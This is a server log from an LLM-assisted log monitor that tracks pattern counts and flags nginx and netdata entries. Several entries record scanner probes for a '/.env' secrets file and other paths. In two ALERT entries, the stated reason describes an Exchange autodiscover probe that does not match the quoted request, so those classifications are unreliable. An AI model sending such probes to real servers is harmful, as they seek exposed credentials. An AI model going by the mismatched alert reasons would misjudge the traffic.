Mar 20 03:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:09:31.933726 [observer] Patterns: hash=1079 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:10:01.938708 [observer] Pipeline: processed=1103 pattern_hits=1082 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:10:01.938738 [observer] Patterns: hash=1082 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:10:31.933680 [observer] Pipeline: processed=1106 pattern_hits=1085 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:10:31.933703 [observer] Patterns: hash=1085 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:11:01.947348 [observer] Pipeline: processed=1110 pattern_hits=1089 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:11:01.947401 [observer] Patterns: hash=1089 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:11:31.934924 [observer] Pipeline: processed=1114 pattern_hits=1093 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:11:31.934950 [observer] Patterns: hash=1093 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:12:01.953510 [observer] Pipeline: processed=1116 pattern_hits=1095 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:12:01.953543 [observer] Patterns: hash=1095 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:12:31.935810 [observer] Pipeline: processed=1120 pattern_hits=1099 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:12:31.935835 [observer] Patterns: hash=1099 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:13:01.936825 [observer] Pipeline: processed=1122 pattern_hits=1101 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:13:01.936852 [observer] Patterns: hash=1101 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:13:31.934558 [observer] Pipeline: processed=1125 pattern_hits=1104 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:13:31.934582 [observer] Patterns: hash=1104 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:14:01.944480 [observer] Pipeline: processed=1128 pattern_hits=1107 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:14:01.944507 [observer] Patterns: hash=1107 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:14:31.948849 [observer] Pipeline: processed=1130 pattern_hits=1109 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:14:31.948875 [observer] Patterns: hash=1109 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:15:01.941724 [observer] Pipeline: processed=1134 pattern_hits=1113 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:15:01.941839 [observer] Patterns: hash=1113 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:15:31.944136 [observer] Pipeline: processed=1136 pattern_hits=1115 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:15:31.944194 [observer] Patterns: hash=1115 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:16:01.940886 [observer] Pipeline: processed=1142 pattern_hits=1121 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:16:01.940940 [observer] Patterns: hash=1121 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:16:31.944311 [observer] Pipeline: processed=1144 pattern_hits=1123 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:16:31.944340 [observer] Patterns: hash=1123 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:17:01.937546 [observer] Pipeline: processed=1147 pattern_hits=1126 llm_calls=21 llm_errors=0 learned=0
Mar 20 03:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:17:01.937573 [observer] Patterns: hash=1126 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=21
Mar 20 03:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:17:31.937206 [observer] Pipeline: processed=1151 pattern_hits=1129 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:17:31.937235 [observer] Patterns: hash=1129 prefix=0 regex=0 contains=0 deny=2 alert=1 suppress=0 misses=22
Mar 20 03:17:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:17:34.262840 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 03:17:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:17:34.262878 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An nginx open() error indicates a missing file for a requested path, which is common in misconfigured routes or probing but not necessarily malicious by itself. Line=2026-03-20T03:17:28.378660570Z 2026/03/20 03:17:28 [error] 422#422: *744422 open() "/usr/share/nginx/default/portal/redlion" failed (2: No such file or directory), client: 20.65.226.8, server: _, requ...
Mar 20 03:17:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:17:34.262964 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T03:17:28.378741101Z 20.65.226.8 - - [20/Mar/2026:03:17:28 +0000] "54.200.221.0" "GET /portal/redlion HTTP/1.1" 404 2401 "-" "Mozilla/5.0 zgrab/0.x" "-"
Mar 20 03:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:18:01.948863 [observer] Pipeline: processed=1154 pattern_hits=1132 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:18:01.948894 [observer] Patterns: hash=1132 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:18:31.934687 [observer] Pipeline: processed=1158 pattern_hits=1136 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:18:31.934715 [observer] Patterns: hash=1136 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:19:01.938361 [observer] Pipeline: processed=1160 pattern_hits=1138 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:19:01.939090 [observer] Patterns: hash=1138 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:19:31.935061 [observer] Pipeline: processed=1164 pattern_hits=1142 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:19:31.935088 [observer] Patterns: hash=1142 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:20:01.974298 [observer] Pipeline: processed=1166 pattern_hits=1144 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:20:01.974331 [observer] Patterns: hash=1144 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:20:31.934560 [observer] Pipeline: processed=1169 pattern_hits=1147 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:20:31.934582 [observer] Patterns: hash=1147 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:21:01.951573 [observer] Pipeline: processed=1174 pattern_hits=1152 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:21:01.951603 [observer] Patterns: hash=1152 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:21:31.950117 [observer] Pipeline: processed=1176 pattern_hits=1154 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:21:31.950147 [observer] Patterns: hash=1154 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:22:01.958277 [observer] Pipeline: processed=1180 pattern_hits=1158 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:22:01.958305 [observer] Patterns: hash=1158 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:22:31.940468 [observer] Pipeline: processed=1182 pattern_hits=1160 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:22:31.940498 [observer] Patterns: hash=1160 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:23:01.957718 [observer] Pipeline: processed=1186 pattern_hits=1164 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:23:01.957751 [observer] Patterns: hash=1164 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:23:31.933875 [observer] Pipeline: processed=1188 pattern_hits=1166 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:23:31.933900 [observer] Patterns: hash=1166 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:24:01.958038 [observer] Pipeline: processed=1191 pattern_hits=1169 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:24:01.958076 [observer] Patterns: hash=1169 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:24:31.940990 [observer] Pipeline: processed=1194 pattern_hits=1172 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:24:31.941013 [observer] Patterns: hash=1172 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:25:01.957453 [observer] Pipeline: processed=1196 pattern_hits=1174 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:25:01.957487 [observer] Patterns: hash=1174 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:25:31.937074 [observer] Pipeline: processed=1200 pattern_hits=1178 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:25:31.937103 [observer] Patterns: hash=1178 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:26:01.958554 [observer] Pipeline: processed=1204 pattern_hits=1182 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:26:01.958583 [observer] Patterns: hash=1182 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:26:31.934010 [observer] Pipeline: processed=1208 pattern_hits=1186 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:26:31.934032 [observer] Patterns: hash=1186 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:27:01.947465 [observer] Pipeline: processed=1210 pattern_hits=1188 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:27:01.947492 [observer] Patterns: hash=1188 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:27:31.933533 [observer] Pipeline: processed=1212 pattern_hits=1190 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:27:31.933562 [observer] Patterns: hash=1190 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:28:01.993306 [observer] Pipeline: processed=1216 pattern_hits=1194 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:28:01.993403 [observer] Patterns: hash=1194 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:28:31.938034 [observer] Pipeline: processed=1218 pattern_hits=1196 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:28:31.938059 [observer] Patterns: hash=1196 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:29:01.949992 [observer] Pipeline: processed=1222 pattern_hits=1200 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:29:01.950027 [observer] Patterns: hash=1200 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:29:31.933790 [observer] Pipeline: processed=1224 pattern_hits=1202 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:29:31.933812 [observer] Patterns: hash=1202 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:30:01.939133 [observer] Pipeline: processed=1228 pattern_hits=1206 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:30:01.939180 [observer] Patterns: hash=1206 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:30:31.943284 [observer] Pipeline: processed=1230 pattern_hits=1208 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:30:31.943306 [observer] Patterns: hash=1208 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:31:01.940069 [observer] Pipeline: processed=1234 pattern_hits=1212 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:31:01.940097 [observer] Patterns: hash=1212 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:31:31.934679 [observer] Pipeline: processed=1238 pattern_hits=1216 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:31:31.934705 [observer] Patterns: hash=1216 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:32:01.948811 [observer] Pipeline: processed=1240 pattern_hits=1218 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:32:01.948841 [observer] Patterns: hash=1218 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:32:31.936479 [observer] Pipeline: processed=1244 pattern_hits=1222 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:32:31.936502 [observer] Patterns: hash=1222 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:33:01.949035 [observer] Pipeline: processed=1246 pattern_hits=1224 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:33:01.949067 [observer] Patterns: hash=1224 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:33:31.933468 [observer] Pipeline: processed=1250 pattern_hits=1228 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:33:31.933491 [observer] Patterns: hash=1228 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:34:01.934663 [observer] Pipeline: processed=1252 pattern_hits=1230 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:34:01.934690 [observer] Patterns: hash=1230 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:34:31.952848 [observer] Pipeline: processed=1254 pattern_hits=1232 llm_calls=22 llm_errors=0 learned=0
Mar 20 03:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:34:31.952876 [observer] Patterns: hash=1232 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=22
Mar 20 03:34:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:34:44.435839 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 03:34:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:34:44.435878 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 03:34:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:34:48.916774 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=regex
Mar 20 03:34:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:34:48.916818 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+)
Mar 20 03:34:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:34:54.329093 [analyzer] LLM verdict for docker:captain-netdata-container: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 03:34:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:34:54.329145 [SUSPICIOUS] Source=docker:captain-netdata-container Reason=Warning about missing configuration file can indicate misconfiguration or partial setup; not malicious but worth monitoring. Line=2026-03-20T03:34:39.574241203Z 2026-03-20 03:34:39: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.
Mar 20 03:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:35:01.952134 [observer] Pipeline: processed=1261 pattern_hits=1236 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:35:01.952178 [observer] Patterns: hash=1236 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25
Mar 20 03:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:35:31.944787 [observer] Pipeline: processed=1263 pattern_hits=1238 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:35:31.944815 [observer] Patterns: hash=1238 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25
Mar 20 03:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:36:01.941683 [observer] Pipeline: processed=1269 pattern_hits=1244 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:36:01.941709 [observer] Patterns: hash=1244 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25
Mar 20 03:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:36:31.940818 [observer] Pipeline: processed=1271 pattern_hits=1246 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:36:31.940848 [observer] Patterns: hash=1246 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25
Mar 20 03:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:37:01.942381 [observer] Pipeline: processed=1275 pattern_hits=1250 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:37:01.942501 [observer] Patterns: hash=1250 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25
Mar 20 03:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:37:31.941054 [observer] Pipeline: processed=1277 pattern_hits=1252 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:37:31.941080 [observer] Patterns: hash=1252 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25
Mar 20 03:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:38:01.943806 [observer] Pipeline: processed=1279 pattern_hits=1254 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:38:01.943837 [observer] Patterns: hash=1254 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25
Mar 20 03:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:38:31.938626 [observer] Pipeline: processed=1283 pattern_hits=1258 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:38:31.938653 [observer] Patterns: hash=1258 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25
Mar 20 03:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:39:01.958806 [observer] Pipeline: processed=1285 pattern_hits=1260 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:39:01.959640 [observer] Patterns: hash=1260 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25
Mar 20 03:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:39:31.933895 [observer] Pipeline: processed=1289 pattern_hits=1264 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:39:31.933919 [observer] Patterns: hash=1264 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25
Mar 20 03:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:40:01.949474 [observer] Pipeline: processed=1291 pattern_hits=1266 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:40:01.949503 [observer] Patterns: hash=1266 prefix=0 regex=0 contains=0 deny=3 alert=1 suppress=0 misses=25
Mar 20 03:40:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:40:04.790309 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to a sensitive file (.env) via HTTP, which is a common probe for exposed configuration data. Line=2026-03-20T03:40:04.789994243Z 2026/03/20 03:40:04 [error] 422#422: *744634 open() "/usr/share/nginx/default/.env" failed (2: No such file or directory), client: 104.238.38.189, server: _, request: "G...
Mar 20 03:40:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:40:04.790382 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T03:40:04.790006737Z 104.238.38.189 - - [20/Mar/2026:03:40:04 +0000] "54.200.221.0" "GET /.env HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, li...
Mar 20 03:40:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:40:05.671884 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on POST to root from an external IP suggests potential probing or misconfigured client attempting forbidden method; notable but not definitive threat. Line=2026-03-20T03:40:05.671582727Z 104.238.38.189 - - [20/Mar/2026:03:40:05 +0000] "54.200.221.0" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like G...
Mar 20 03:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:40:31.935140 [observer] Pipeline: processed=1298 pattern_hits=1273 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:40:31.935264 [observer] Patterns: hash=1273 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:41:01.959024 [observer] Pipeline: processed=1300 pattern_hits=1275 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:41:01.959051 [observer] Patterns: hash=1275 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:41:31.943449 [observer] Pipeline: processed=1304 pattern_hits=1279 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:41:31.943476 [observer] Patterns: hash=1279 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
Mar 20 03:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:42:01.947094 [observer] Pipeline: processed=1308 pattern_hits=1283 llm_calls=25 llm_errors=0 learned=0
Mar 20 03:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 03:42:01.947127 [observer] Patterns: hash=1283 prefix=0 regex=0 contains=0 deny=4 alert=3 suppress=0 misses=25
